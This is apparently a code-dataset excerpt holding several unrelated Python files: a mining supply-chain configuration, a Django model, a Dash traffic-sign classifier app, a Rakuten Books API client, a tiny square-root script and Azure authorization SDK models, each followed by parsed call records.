18, 337, 48), 'scitbx.math.five_number_summary', 'five_number_summary', ({(337, 38, 337, 47): 'flat_data'}, {}), '(flat_data)', False, 'from scitbx.math import five_number_summary\n'), ((359, 20, 359, 52), 'dials.util.tabulate', 'tabulate', (), '', False, 'from dials.util import Sorry, tabulate\n'), ((564, 20, 564, 54), 'dials.util.tabulate', 'tabulate', (), '', False, 'from dials.util import Sorry, tabulate\n'), ((279, 22, 279, 40), 'dials.array_family.flex.vec3_double', 'flex.vec3_double', ({}, {}), '()', False, 'from dials.array_family import flex\n'), ((280, 25, 280, 43), 'dials.array_family.flex.vec3_double', 'flex.vec3_double', ({}, {}), '()', False, 'from dials.array_family import flex\n'), ((294, 33, 294, 79), 'cctbx.uctbx.unit_cell', 'uctbx.unit_cell', ({(294, 49, 294, 78): '(a, b, c, alpha, beta, gamma)'}, {}), '((a, b, c, alpha, beta, gamma))', False, 'from cctbx import uctbx\n'), ((517, 47, 517, 60), 'dials.array_family.flex.min', 'flex.min', ({(517, 56, 517, 59): 'col'}, {}), '(col)', False, 'from dials.array_family import flex\n'), ((518, 47, 518, 60), 'dials.array_family.flex.max', 'flex.max', ({(518, 56, 518, 59): 'col'}, {}), '(col)', False, 'from dials.array_family import flex\n'), ((519, 47, 519, 61), 'dials.array_family.flex.mean', 'flex.mean', ({(519, 57, 519, 60): 'col'}, {}), '(col)', False, 'from dials.array_family import flex\n'), ((539, 47, 539, 59), 'dials.array_family.flex.min', 'flex.min', ({(539, 56, 539, 58): 'si'}, {}), '(si)', False, 'from dials.array_family import flex\n'), ((540, 47, 540, 59), 'dials.array_family.flex.max', 'flex.max', ({(540, 56, 540, 58): 'si'}, {}), '(si)', False, 'from dials.array_family import flex\n'), ((541, 47, 541, 60), 'dials.array_family.flex.mean', 'flex.mean', ({(541, 57, 541, 59): 'si'}, {}), '(si)', False, 'from 
dials.array_family import flex\n'), ((549, 47, 549, 67), 'dials.array_family.flex.min', 'flex.min', ({(549, 56, 549, 66): 'bbox_sizes'}, {}), '(bbox_sizes)', False, 'from dials.array_family import flex\n'), ((550, 47, 550, 67), 'dials.array_family.flex.max', 'flex.max', ({(550, 56, 550, 66): 'bbox_sizes'}, {}), '(bbox_sizes)', False, 'from dials.array_family import flex\n'), ((551, 47, 551, 68), 'dials.array_family.flex.mean', 'flex.mean', ({(551, 57, 551, 67): 'bbox_sizes'}, {}), '(bbox_sizes)', False, 'from dials.array_family import flex\n'), ((558, 47, 558, 67), 'dials.array_family.flex.min', 'flex.min', ({(558, 56, 558, 66): 'fore_valid'}, {}), '(fore_valid)', False, 'from dials.array_family import flex\n'), ((559, 47, 559, 67), 'dials.array_family.flex.max', 'flex.max', ({(559, 56, 559, 66): 'fore_valid'}, {}), '(fore_valid)', False, 'from dials.array_family import flex\n'), ((560, 47, 560, 68), 'dials.array_family.flex.mean', 'flex.mean', ({(560, 57, 560, 67): 'fore_valid'}, {}), '(fore_valid)', False, 'from dials.array_family import flex\n')]
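A hypothetical sketch of driving the command-line tool from the record above programmatically; the module path and the file names are assumptions (dials normally installs this script as dials.show), so treat this as an illustration rather than the project's documented API:

# Hypothetical usage sketch -- module path and file names are assumptions.
# run() parses PHIL-style arguments the same way the command line does.
from dials.command_line.show import run

run(args=["integrated.expt", "integrated.refl", "show_flags=True"])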
OuissalTAIM/jenkins
app/config/env_jesa.py
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
# -*- coding: utf-8 -*- from enum import Enum, IntEnum, unique import os APP_NAME = "mine2farm" NETWORK_NAME = "CenterAxis" LOG_LEVEL_CONSOLE = "WARNING" LOG_LEVEL_FILE = "INFO" APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/") LOG_FOLDER = APP_FOLDER + "app/log/" LOG_FILE = "%(asctime)_" + APP_NAME + ".log" OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/") CANVAS_URL = "http://127.0.0.1/canvas.xlsm" # DB DB_NAME = None DB_HOST = "172.29.161.208" DB_PORT = 5006 DATA_SERVICE_ADD = "172.29.161.208" DATA_SERVICE_PORT = 5001 # Results DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None DB_DETAILED_RESULT_COLLECTION_NAME = "detailed" DB_GLOBAL_RESULT_COLLECTION_NAME = "global" DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best" DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best" DB_SENSITIVITY_COLLECTION_NAME = "sensitivity" RESULT_BATCHES_SIZE = 25 HEAD_DATA_BITS = 17 DB_NAME_BITS = 20 RANDOMIZE_RESULTS = False # RabbitMQ RABBITMQ_SERVER = "localhost" RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE" RABBITMQ_CYCLE = 3 RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL" RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL" RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin" # Memcached MEMCACHED_SERVER = 'localhost' MEMCACHED_PORT = 11211 # Dashboard DB_LOAD_FROM_SERVICE = True # Monitoring MONITORING_APP_NAME = "mine2farm_monitor" MONITORING_SERVER = "172.29.161.208" MONITORING_PORT = 5002 MONITORING_DB_NAME = "task_history" MONITORING_COLLECTION_HISTORY_NAME = "task" MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history" MONITORING_STEP = 1 MONITORING_NB_PAGE = 10 # Mongodb-bi MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin" # Mongodb MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin" # params LOGISTICS_LP = False MODE_DEBUG = False GRANUL_RELAX = False class HTML_STATUS(IntEnum): ERROR = -1 OK = 0 # Model MONIKER_SEPARATOR = "/" WACC = 0.1 T0 = 2020 TMAX = 2031 class PriceParams(Enum): WACC = 0 TENOR = 1 VOLUME = 2 class PipelineType(Enum): COMMON = 0 PRODUCER = 1 TRANSPORT = 2 BALANCE = 3 PRICE = 4 SALES = 5 @unique class PipelineLayer(IntEnum): UNDEFINED = -1 MINE = 0 BENEFICIATION = 1 SAP = 2 PAP = 3 GRANULATION = 4 LOGISTICS = 5 RAW_MATERIALS = 8 COMMON = 9 SALES_PLAN = 10 MINE_BENEFICIATION = 11 UNIT_CONVERSION_MATRIX = 12 PIPELINE_SCHEMA = { PipelineLayer.COMMON: { "type": PipelineType.COMMON, "dico": ["location", "opex", "unit", "currency", "output", "names", "products"] }, PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"], "options": "mining_options", "production": "mining_specific_production", "opex": "mining_opex___specific_consumptions", "capex": "mining_capex", "priority_mines": "prioritymines" }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"], "options": "beneficiation_options", "production": "beneficiation_production", "opex": "beneficiation_opex___specific_consumptions", "capex": "beneficiation_capex" }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"], "options": "sap___power_plant_options", "production": "sap___power_plant_production", "opex": "sap___power_plant_opex___specific_consumptions", "capex": "sap___power_plant_capex", 
"product_type": "sap.product" }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"], "options": "pap_options", "production": "pap_production", "opex": "pap_opex___specific_consumptions", "capex": "pap_capex", "product_type": "pap.product" }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"], "options": "granulation_options", "production": "granulation_production", "opex": "granulation_opex", "capex": "granulation_capex" }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"], "options": "logistics_options", "production": None, "opex": "logistics_opex", "capex": "logistics_capex" }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "data": "raw_materials" }, PipelineLayer.SALES_PLAN: { "type": PipelineType.SALES, "data": "sales_plan" }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": PipelineType.COMMON, "data": "conv_matrix" }, } SUPPLY_CHAIN = "mine2port" DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE), "sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)} COMBO_NODES = { PipelineLayer.MINE_BENEFICIATION: { "url": "mining_wp_connections", "upstream_layer": PipelineLayer.MINE, "downstream_layer": PipelineLayer.BENEFICIATION } } COMBO_NODES_SEPARATION = "--" class FunctionType(Enum): COST_PV = 0 CASH_COST = 1 FULL_COST = 2 class ScenarioGeneratorType(IntEnum): FROM_PATHS = 0 FROM_OPTIONS = 1 SPECIFIC_SCENARIOS = 2 SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS PIPELINE_METADATA = { PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "production": ["Name", "Extraction", "Quality", "Unit"], "opex": ["Name", "Extraction", "Capacity", "Item", "Unit"], "capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"], "opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"], "capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "production": ["Location", "Process", "Product", "Unit"], "opex": ["Location", "Process", "Item", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"], "capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"], "capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "columns": ["Item", "Unit"] }, PipelineLayer.SALES_PLAN: { "type": PipelineType.PRICE, "columns": ["Type", "Product", "Unit"] }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": 
PipelineType.COMMON, "columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"] }, } class ShuffleLevel(IntEnum): UNDEFINED = 0 SHUFFLE_WITHOUT_PERM = 1 SHUFFLE_WITH_PERMUTATIONS = 2 SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3 SHUFFLE_WITH_UNNAMED = 4 SHUFFLE_LEVELS = { PipelineLayer.MINE: ShuffleLevel.UNDEFINED, PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED, PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED, PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED, PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED }
[((12, 13, 12, 71), 'os.getenv', 'os.getenv', ({(12, 23, 12, 44): '"""JESA_MINE2FARM_HOME"""', (12, 46, 12, 70): '"""C:/GitRepos/mine2farm/"""'}, {}), "('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')", False, 'import os\n')]
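A small, hypothetical sketch of how the configuration module above is typically consumed; the import path simply mirrors the repo_path (app/config/env_jesa.py) and is an assumption:

# Hypothetical usage sketch -- import path mirrors app/config/env_jesa.py.
from app.config.env_jesa import MONIKER_SEPARATOR, PIPELINE_SCHEMA, PipelineLayer

mine_cfg = PIPELINE_SCHEMA[PipelineLayer.MINE]
print(mine_cfg["options"])                               # "mining_options"
print(MONIKER_SEPARATOR.join(["MINE", "extraction", "capex"]))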
cankush625/Django
myFirstApp/travello/models.py
a3e874a69fbf34bf9123a7d60697a2449c7591c6
from django.db import models

# Create your models here.

class Destination(models.Model) :
    name = models.CharField(max_length = 100)
    img = models.ImageField(upload_to = 'pics')
    desc = models.TextField()
    price = models.IntegerField()
    offer = models.BooleanField(default = False)


class News() :
    id : int
    img : str
    date : int
    month : str
    headline : str
    category : str
    desc : str
[((6, 11, 6, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((7, 10, 7, 47), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import models\n'), ((8, 11, 8, 29), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import models\n'), ((9, 12, 9, 33), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import models\n'), ((10, 12, 10, 48), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n')]
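A hypothetical usage sketch for the Destination model above; the view name and template are illustrative, and it assumes the travello app is installed and migrated:

# Hypothetical usage sketch -- view name and template are illustrative.
from django.shortcuts import render

from travello.models import Destination


def index(request):
    # Only destinations currently on offer, cheapest first.
    destinations = Destination.objects.filter(offer=True).order_by("price")
    return render(request, "index.html", {"dests": destinations})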
Moustique-bot/hands-on-2021
app/app.py
fd023f0a431f72ef2c48e3a469be42e2de9e2957
import base64 import io import dash import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc from dash.dependencies import Input, Output import numpy as np import tensorflow as tf from PIL import Image from constants import CLASSES import yaml with open('app.yaml') as yaml_data : params = yaml.safe_load(yaml_data) IMAGE_WIDTH = params['IMAGE_WIDTH'] IMAGE_HEIGHT = params['IMAGE_HEIGHT'] PATH_MODEL = params['PATH_MODEL'] # Load DNN model classifier = tf.keras.models.load_model(PATH_MODEL) def classify_image(image, model, image_box=None): """Classify image by model Parameters ---------- content: image content model: tf/keras classifier Returns ------- class id returned by model classifier """ images_list = [] image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box) # box argument clips image to (x1, y1, x2, y2) image = np.array(image) images_list.append(image) return model.predict_classes(np.array(images_list)) app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP]) pre_style = { 'whiteSpace': 'pre-wrap', 'wordBreak': 'break-all', 'whiteSpace': 'normal' } # Define application layout navbar = dbc.NavbarSimple( children=[ dbc.DropdownMenu( children=[ dbc.DropdownMenuItem('Réseau de Neurones', header=True), dbc.DropdownMenuItem('SVM', href="#"), ], nav=True, in_navbar=True, label='Modèle', ), ], brand="Menu", brand_href="#", color= "#d90054", dark=True ) cards = html.Div( [ dbc.Card( dbc.CardBody( [ html.H5("Présentation", className="card-title"), html.P( [ 'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. 
En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.', ], className='card-text', ), ] ), className='w-75 mb-3', color='#f1cbd1', outline='Black', style={ 'margin-top': '75px', 'margin-left': '185px'}, ), ] ) app.layout = html.Div([ html.Div([navbar]), html.Div(cards), dcc.Upload( id='bouton-chargement', children=html.Div([ 'Cliquer-déposer ou ', html.A('sélectionner une image') ]), style={ 'width': '50%', 'height': '60px', 'lineHeight': '60px', 'borderWidth': '1px', 'borderStyle': 'dashed', 'borderRadius': '5px', 'textAlign': 'center', 'margin-top': '75px', 'margin-left': '370px', } ), html.Div(id='mon-image'), html.Div(id='ma-zone-resultat') ]) @app.callback(Output('mon-image', 'children'), [Input('bouton-chargement', 'contents')]) def update_output(contents): if contents is not None: content_type, content_string = contents.split(',') if 'image' in content_type: image = Image.open(io.BytesIO(base64.b64decode(content_string))) predicted_class = classify_image(image, classifier)[0] return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src=contents, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), #html.Div('Raw Content'), #html.Pre(contents, style=pre_style) ]) else: try: # Décodage de l'image transmise en base 64 (cas des fichiers ppm) # fichier base 64 --> image PIL image = Image.open(io.BytesIO(base64.b64decode(content_string))) # image PIL --> conversion PNG --> buffer mémoire buffer = io.BytesIO() image.save(buffer, format='PNG') # buffer mémoire --> image base 64 buffer.seek(0) img_bytes = buffer.read() content_string = base64.b64encode(img_bytes).decode('ascii') # Appel du modèle de classification predicted_class = classify_image(image, classifier)[0] # Affichage de l'image return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), ]) except: return html.Div([ html.Hr(), html.Div('Uniquement des images svp : {}'.format(content_type)), html.Hr(), html.Div('Raw Content'), html.Pre(contents, style=pre_style) ]) # Manage interactions with callbacks @app.callback( Output(component_id='ma-zone-resultat', component_property='children'), [Input(component_id='mon-champ-texte', component_property='value')] ) def update_output_div(input_value): return html.H3('Valeur saisie ici "{}"'.format(input_value)) # Start the application if __name__ == '__main__': app.run_server(debug=True)
[((26, 13, 26, 51), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', ({(26, 40, 26, 50): 'PATH_MODEL'}, {}), '(PATH_MODEL)', True, 'import tensorflow as tf\n'), ((49, 6, 49, 89), 'dash.Dash', 'dash.Dash', (), '', False, 'import dash\n'), ((18, 13, 18, 38), 'yaml.safe_load', 'yaml.safe_load', ({(18, 28, 18, 37): 'yaml_data'}, {}), '(yaml_data)', False, 'import yaml\n'), ((43, 10, 43, 25), 'numpy.array', 'np.array', ({(43, 19, 43, 24): 'image'}, {}), '(image)', True, 'import numpy as np\n'), ((130, 14, 130, 45), 'dash.dependencies.Output', 'Output', ({(130, 21, 130, 32): '"""mon-image"""', (130, 34, 130, 44): '"""children"""'}, {}), "('mon-image', 'children')", False, 'from dash.dependencies import Input, Output\n'), ((179, 4, 179, 74), 'dash.dependencies.Output', 'Output', (), '', False, 'from dash.dependencies import Input, Output\n'), ((46, 31, 46, 52), 'numpy.array', 'np.array', ({(46, 40, 46, 51): 'images_list'}, {}), '(images_list)', True, 'import numpy as np\n'), ((105, 4, 105, 22), 'dash_html_components.Div', 'html.Div', ({(105, 13, 105, 21): '[navbar]'}, {}), '([navbar])', True, 'import dash_html_components as html\n'), ((107, 4, 107, 19), 'dash_html_components.Div', 'html.Div', ({(107, 13, 107, 18): 'cards'}, {}), '(cards)', True, 'import dash_html_components as html\n'), ((126, 4, 126, 28), 'dash_html_components.Div', 'html.Div', (), '', True, 'import dash_html_components as html\n'), ((127, 4, 127, 35), 'dash_html_components.Div', 'html.Div', (), '', True, 'import dash_html_components as html\n'), ((131, 15, 131, 53), 'dash.dependencies.Input', 'Input', ({(131, 21, 131, 40): '"""bouton-chargement"""', (131, 42, 131, 52): '"""contents"""'}, {}), "('bouton-chargement', 'contents')", False, 'from dash.dependencies import Input, Output\n'), ((180, 5, 180, 70), 'dash.dependencies.Input', 'Input', (), '', False, 'from dash.dependencies import Input, Output\n'), ((152, 25, 152, 37), 'io.BytesIO', 'io.BytesIO', ({}, {}), '()', False, 'import io\n'), ((85, 20, 85, 68), 'dash_html_components.H5', 'html.H5', (), '', True, 'import dash_html_components as html\n'), ((86, 20, 91, 21), 'dash_html_components.P', 'html.P', (), '', True, 'import dash_html_components as html\n'), ((136, 42, 136, 74), 'base64.b64decode', 'base64.b64decode', ({(136, 59, 136, 73): 'content_string'}, {}), '(content_string)', False, 'import base64\n'), ((139, 16, 139, 53), 'dash_html_components.Hr', 'html.Hr', (), '', True, 'import dash_html_components as html\n'), ((140, 16, 140, 70), 'dash_html_components.Img', 'html.Img', (), '', True, 'import dash_html_components as html\n'), ((142, 16, 142, 25), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((66, 16, 66, 72), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (), '', True, 'import dash_bootstrap_components as dbc\n'), ((67, 16, 67, 53), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (), '', True, 'import dash_bootstrap_components as dbc\n'), ((112, 20, 112, 53), 'dash_html_components.A', 'html.A', ({(112, 27, 112, 52): '"""sélectionner une image"""'}, {}), "('sélectionner une image')", True, 'import dash_html_components as html\n'), ((150, 46, 150, 78), 'base64.b64decode', 'base64.b64decode', ({(150, 63, 150, 77): 'content_string'}, {}), '(content_string)', False, 'import base64\n'), ((157, 33, 157, 60), 'base64.b64encode', 'base64.b64encode', ({(157, 50, 157, 59): 'img_bytes'}, {}), '(img_bytes)', False, 'import base64\n'), ((162, 20, 162, 57), 
'dash_html_components.Hr', 'html.Hr', (), '', True, 'import dash_html_components as html\n'), ((163, 20, 163, 107), 'dash_html_components.Img', 'html.Img', (), '', True, 'import dash_html_components as html\n'), ((165, 20, 165, 29), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((169, 20, 169, 29), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((171, 20, 171, 29), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((172, 20, 172, 43), 'dash_html_components.Div', 'html.Div', ({(172, 29, 172, 42): '"""Raw Content"""'}, {}), "('Raw Content')", True, 'import dash_html_components as html\n'), ((173, 20, 173, 55), 'dash_html_components.Pre', 'html.Pre', (), '', True, 'import dash_html_components as html\n')]
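A hypothetical sketch calling classify_image from the record above outside the Dash callbacks. Importing app executes its module-level code, so app.yaml and the model referenced by PATH_MODEL must exist; note also that predict_classes, used inside classify_image, was removed from tf.keras after TensorFlow 2.5, so an older TensorFlow with a Sequential model is assumed. The image file name is a placeholder:

# Hypothetical usage sketch -- file names are placeholders; importing app
# loads the Keras model declared in app.yaml.
from PIL import Image

from app import CLASSES, classifier, classify_image

img = Image.open("test_sign.ppm")
class_id = classify_image(img, classifier)[0]
print("Predicted class:", CLASSES[class_id])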
NobukoYano/LibraryApp
books/rakutenapi.py
623f60614f15ab760e1c0d2f18954ce948f2d2a3
import json
import requests

from django.conf import settings


class rakuten:

    def get_json(self, isbn: str) -> dict:
        appid = settings.RAKUTEN_APP_ID

        # API request template
        api = "https://app.rakuten.co.jp/services/api/BooksTotal/"\
              "Search/20170404?format=json&isbnjan={isbnjan}&"\
              "applicationId={appid}"

        # format get api URL
        url = api.format(isbnjan=isbn, appid=appid)

        # execute
        r = requests.get(url)

        # decode to json
        # Check the status code
        status_code = r.status_code
        if status_code != 200:
            # if failed
            return None

        data = json.loads(r.text)
        if data['count'] == 0:
            return None

        json_data = {}
        json_data['isbn'] = data['Items'][0]['Item']['isbn']
        json_data['title'] = data['Items'][0]['Item']['title']
        json_data['publisher'] = data['Items'][0]['Item']['publisherName']
        json_data['pubdate'] = data['Items'][0]['Item']['salesDate']
        json_data['cover'] = data['Items'][0]['Item']['largeImageUrl']
        json_data['author'] = data['Items'][0]['Item']['author']

        return json_data
[((21, 12, 21, 29), 'requests.get', 'requests.get', ({(21, 25, 21, 28): 'url'}, {}), '(url)', False, 'import requests\n'), ((30, 15, 30, 33), 'json.loads', 'json.loads', ({(30, 26, 30, 32): 'r.text'}, {}), '(r.text)', False, 'import json\n')]
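A hypothetical usage sketch for the rakuten helper above; it assumes RAKUTEN_APP_ID is set in the Django settings, and the ISBN is illustrative:

# Hypothetical usage sketch -- requires settings.RAKUTEN_APP_ID to be configured.
from books.rakutenapi import rakuten

client = rakuten()
book = client.get_json("9784873117386")  # illustrative ISBN
if book is None:
    print("Request failed or no match for this ISBN")
else:
    print(book["title"], "/", book["author"])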
naumoff0/Archive
Random-Programs/optimization/root/v4.py
d4ad2da89abb1576dd5a7c72ded6bf9b45c3f610
print(int(input(""))**0.5)
[]
rsdoherty/azure-sdk-for-python
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
6bba5326677468e6660845a703686327178bb7b1
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, List, Optional from azure.core.exceptions import HttpResponseError import msrest.serialization class ErrorAdditionalInfo(msrest.serialization.Model): """The resource management error additional info. Variables are only populated by the server, and will be ignored when sending a request. :ivar type: The additional info type. :vartype type: str :ivar info: The additional info. :vartype info: any """ _validation = { 'type': {'readonly': True}, 'info': {'readonly': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'info': {'key': 'info', 'type': 'object'}, } def __init__( self, **kwargs ): super(ErrorAdditionalInfo, self).__init__(**kwargs) self.type = None self.info = None class ErrorDetail(msrest.serialization.Model): """The error detail. Variables are only populated by the server, and will be ignored when sending a request. :ivar code: The error code. :vartype code: str :ivar message: The error message. :vartype message: str :ivar target: The error target. :vartype target: str :ivar details: The error details. :vartype details: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail] :ivar additional_info: The error additional info. :vartype additional_info: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorAdditionalInfo] """ _validation = { 'code': {'readonly': True}, 'message': {'readonly': True}, 'target': {'readonly': True}, 'details': {'readonly': True}, 'additional_info': {'readonly': True}, } _attribute_map = { 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'target': {'key': 'target', 'type': 'str'}, 'details': {'key': 'details', 'type': '[ErrorDetail]'}, 'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'}, } def __init__( self, **kwargs ): super(ErrorDetail, self).__init__(**kwargs) self.code = None self.message = None self.target = None self.details = None self.additional_info = None class ErrorResponse(msrest.serialization.Model): """Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.). :param error: The error object. :type error: ~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail """ _attribute_map = { 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, *, error: Optional["ErrorDetail"] = None, **kwargs ): super(ErrorResponse, self).__init__(**kwargs) self.error = error class Permission(msrest.serialization.Model): """Role definition permissions. :param actions: Allowed actions. :type actions: list[str] :param not_actions: Denied actions. :type not_actions: list[str] :param data_actions: Allowed Data actions. :type data_actions: list[str] :param not_data_actions: Denied Data actions. 
:type not_data_actions: list[str] """ _attribute_map = { 'actions': {'key': 'actions', 'type': '[str]'}, 'not_actions': {'key': 'notActions', 'type': '[str]'}, 'data_actions': {'key': 'dataActions', 'type': '[str]'}, 'not_data_actions': {'key': 'notDataActions', 'type': '[str]'}, } def __init__( self, *, actions: Optional[List[str]] = None, not_actions: Optional[List[str]] = None, data_actions: Optional[List[str]] = None, not_data_actions: Optional[List[str]] = None, **kwargs ): super(Permission, self).__init__(**kwargs) self.actions = actions self.not_actions = not_actions self.data_actions = data_actions self.not_data_actions = not_data_actions class PermissionGetResult(msrest.serialization.Model): """Permissions information. :param value: An array of permissions. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[Permission]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["Permission"]] = None, next_link: Optional[str] = None, **kwargs ): super(PermissionGetResult, self).__init__(**kwargs) self.value = value self.next_link = next_link class ProviderOperation(msrest.serialization.Model): """Operation. :param name: The operation name. :type name: str :param display_name: The operation display name. :type display_name: str :param description: The operation description. :type description: str :param origin: The operation origin. :type origin: str :param properties: The operation properties. :type properties: any :param is_data_action: The dataAction flag to specify the operation type. :type is_data_action: bool """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'properties': {'key': 'properties', 'type': 'object'}, 'is_data_action': {'key': 'isDataAction', 'type': 'bool'}, } def __init__( self, *, name: Optional[str] = None, display_name: Optional[str] = None, description: Optional[str] = None, origin: Optional[str] = None, properties: Optional[Any] = None, is_data_action: Optional[bool] = None, **kwargs ): super(ProviderOperation, self).__init__(**kwargs) self.name = name self.display_name = display_name self.description = description self.origin = origin self.properties = properties self.is_data_action = is_data_action class ProviderOperationsMetadata(msrest.serialization.Model): """Provider Operations metadata. :param id: The provider id. :type id: str :param name: The provider name. :type name: str :param type: The provider type. :type type: str :param display_name: The provider display name. :type display_name: str :param resource_types: The provider resource types. :type resource_types: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ResourceType] :param operations: The provider operations. 
